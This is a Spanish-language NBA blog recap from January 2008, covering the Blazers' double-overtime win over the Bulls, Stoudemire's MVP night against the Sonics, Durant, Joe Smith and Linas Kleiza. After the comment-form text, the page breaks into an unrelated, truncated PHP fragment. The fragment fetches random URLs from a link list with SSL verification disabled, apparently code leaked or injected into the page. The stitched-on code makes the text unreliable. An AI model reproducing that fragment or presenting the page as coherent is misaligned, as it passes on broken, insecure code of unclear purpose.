La crónica (03/01/08)

04 de January de 2008 por MagicJohnson32

La noche deparó tres emocionantes encuentros, uno de ellos resuelto tras dos prórrogas. Concretamente fue el que disputaron Blazers y Bulls en el United Center y que sirvió para confirmar el gran momento de los de Portland, que ya suman 15 victorias en 16 partidos. Anoche estuvieron, una vez más, liderados por Brandon Roy, con 25 puntos y 11 asistencias, y sobrevivieron a los 63 anotados entre Ben Gordon y Joe Smith. El partido con un marcador más propio del Este lo jugaron, sin embargo, Nuggets y Spurs, con victoria de los primeros por 77-80 gracias a los 29 puntos de Iverson y a los 14 tapones colocados entre Kenyon Martin, Marcus Camby y Nené Hilario. Por último, los Suns celebraron su 40º aniversario situándose como el equipo con más victorias de la Conferencia Oeste al superar a los Sonics pese a un primer cuarto en el que los de Seattle veinte puntos arriba (13-33). Amare Stoudemire lideró la remontada y es nuestro MVP de la noche.

Vamos con los detalles de lo que deparó la madrugada en la NBA:

Resultados:

Spurs 77 – 80 Nuggets

Sonics 96 – 104 Suns

blazerswinchicagoEl partido de la noche:

Blazers 115 – 109 Bulls

Brandon Roy no es sólo un grandísimo jugador. Noche tras noche está demostrando ser un magnífico líder y el jugador óptimo para encabezar a estos ilusionantes Blazers que están entre los mejores del Oeste. Anoche volvió a comportarse como tal, manteniéndose en pista pese a sufrir dos golpes, uno en el coxis que le redujo la movilidad y otro bajo el ojo que le provocó un corte. Así es como un jugador se gana los galones, y Roy actualmente los tiene todos en su equipo. Logró 25 puntos, 11 asistencias sin pérdidas, 6 rebotes y 2 robos en 49 minutos de juego, y contó con la colaboración de dos suplentes, Travis Outlaw, con 21 puntos, y Jarret Jack, que hizo 17 y logró la acción de 3 puntos que dio el triunfo final a los de Oregon. Gordon y Joe Smith se fueron sin premio tras sus magníficas actuaciones, con 32 puntos (15 de 27 en tiros), 5 rebotes y 3 asistencias del primero y 31-11 del segundo. Los Bulls, además, perdieron a Deng al inicio del segundo cuarto al agravarse unas molestias en el tendón de Aquiles. La igualdad fue casi absoluta durante todo el encuentro y sólo la acción de Jack, tras una pérdida de balón de Gordon, desequilibró definitivamente la balanza del lado visitante.

 

amaresonicsNuestro MVP de la noche: Siempre que Amare logra más de 20 puntos y 10 rebotes, los Suns ganan. Anoche los Sonics fueron incapaces de frenar a Stoudemire, que se fue hasta los 34 puntos con 11 de 19 en tiros de campo, con 1 de 1 en triples y 11 de 15 en libres, cifras a las que añadió 11 rebotes y 3 tapones en 34 minutos de juego. Así que de nada sirvió a Seattle situarse 13-33 en el primer cuarto del partido. Los dos siguientes cuartos supusieron un parcial de 30-59 para los locales, y, de la mano de Amare, el triunfo se quedó en Arizona.kevindurantsmiles

El rookie de la noche: nos gustaría ver a Kevin Durant hacer algo más que tirar y anotar. Sin embargo, con un equipo como los actuales Sonics, poco más puede hacer el jugador destinado a hacerse con el premio al Rookie del Año. Anoche logró 28 puntos, 7 rebotes y 2 tapones en cancha de los Suns y volvió a dar muestras de su capacidad anotadora. Esperamos más de él pero sólo porque sabemos que es capaz de ello.

La sorpresa de la noche: está haciendo una buena temporada Joe Smith y la llegada de Boylan al banquillo de los Bulls parece haberle sentado muy bien al que fuera número 1 del draft. Consolidado como titular, anoche se fue hasta los 31 puntos con 11 de 17 en tiros de campo y 9 de 10 en libres, con 11 rebotes y 4 tapones en 45 minutos de juego. La derrota de los Bulls en dos prórrogas ante los Blazers no ha de empañar la mejor actuación que le recordamos a Smith en mucho, mucho tiempo.

La decepción de la noche: nos gusta Linas Kleiza y, tras cinco partidos consecutivos anotando más de 10 puntos, parecía asentado como sexto hombre en la rotación de George Karl. Anoche, sin embargo, el lituano firmó un partido para olvidar al fallar sus 5 lanzamientos y dejar su cuenta anotadora a 0. Y si un anotador no anota…

Os dejamos con las 10 mejores jugadas de la pasada madrugada.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>